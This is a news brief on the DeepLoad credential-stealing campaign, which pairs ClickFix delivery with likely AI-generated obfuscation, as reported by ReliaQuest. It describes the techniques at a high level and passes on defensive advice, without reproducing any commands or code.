Skip to main content
Explore our brands An Informa TechTarget Publication
close search
site logo
Dive Brief

Newly observed malware campaign likely combines AI and ClickFix

Using the techniques in tandem helps hackers evade detection, a security firm said.

Published March 30, 2026
Eric Geller's headshot
Senior Reporter
Exclamation mark depicted over code.
Getty Images

Dive Brief:

  • Hackers may be using AI to hide malware that steals user credentials from enterprise environments as part of an alarming new attack campaign, according to ReliaQuest.
  • The malware’s combination of AI-enabled obfuscation and delivery via the stealthy “ClickFix” technique makes it a potent threat to watch out for, researchers said in a report published on Monday.
  • ReliaQuest urged organizations to perform ongoing behavioral analysis of computers on their networks to catch the malware in the act, given that its fileless operations can bypass more traditional static defenses.

Dive Insight:

The malware described in the report, dubbed DeepLoad, represents a toxic combination of trends in cybersecurity: the reliance on the ClickFix delivery method and the increasing use of AI as an obfuscation technique.

Over the past few years, the ClickFix technique — which involves tricking users into running commands in Windows Terminal or Windows PowerShell that grant the intruders broad access — has surged in popularity as a delivery method for malware. The technique involves legitimate users performing theoretically safe behaviors, making it hard for security software to detect it. 

With the right PowerShell command, the results can be severe.

“In this campaign, this one command was enough to establish persistent, reboot-surviving access by creating a scheduled task configured to repeatedly re-execute the loader,” ReliaQuest said. “From there, mshta.exe, a legitimate Windows utility often abused for remote script execution, reached the attacker’s staging infrastructure and pulled down an obfuscated PowerShell loader.”

That loader contained “thousands of meaningless variable assignments that resemble routine scripting,” and researchers said this “busy” design was meant to hide the loader’s malicious functionality inside the noise.

ReliaQuest considers it unlikely that a human manually produced the vast quantity of gibberish code.

“Template-based tools are possible, but the quality and consistency we observed likely point to AI,” researchers wrote. “If so, what once may have taken days to build could probably be produced in an afternoon. It’s also a realistic possibility that AI helped write the attack logic itself, not just the noise around it.”

Static malware detection tools buckle under such a volume of code, researchers said. “There’s simply too much noise to sift through.”

Instead, ReliaQuest recommends that organizations use a Microsoft security feature called PowerShell Script Block Logging, which allows the computer to scrutinize and record PowerShell commands in real time.

ReliaQuest’s report also describes how the DeepLoad malware hides in the Windows operation system by embedding itself in the rarely scrutinized process that runs the Windows lock screen.

Because the malware can collect both stored credentials and passwords that users enter after the compromise, ReliaQuest urged compromised organizations to change all passwords that an affected machine can access.

The security firm also said organizations need to watch for hackers’ abuse of the Windows Management Instrumentation event subscription feature. WMI subscriptions can execute code based on predefined triggers, which can have beneficial uses, but because most security teams don’t check for rogue subscriptions when remediating malware infections, ReliaQuest said, hackers are abusing the feature to redeploy DeepLoad after remediation.

Filed Under: Cyberattacks, Threats

Editors' picks

Company Announcements

View all | Post a press release
Zapier Pledges Free AI Education for 1 Million People
From Zapier
March 17, 2026
Zapier logo
CyberFOX AutoElevate Named a High Performer in G2’s Spring 2026 Report for Privileged Access M…
From CyberFOX
April 01, 2026
CyberFOX logo
Why Edge RF Awareness Is Essential for the M2M Era
From Digital Global Systems
March 16, 2026
Digital Global Systems logo
Realm.Security Rolls Out AI-Ready Security Data for the Modern SOC Ahead of RSA Conference
From Realm.Security
March 16, 2026
Realm.Security logo
Editors' picks
Latest in Cyberattacks
This website is owned and operated by Informa TechTarget, a global network that informs, influences and connects the world's technology buyers and sellers.

© 2025 TechTarget, Inc. or its subsidiaries. All rights reserved. An Informa PLC company.
Privacy policy | Terms of use | Take down policy | Cookie Preferences / Do Not Sell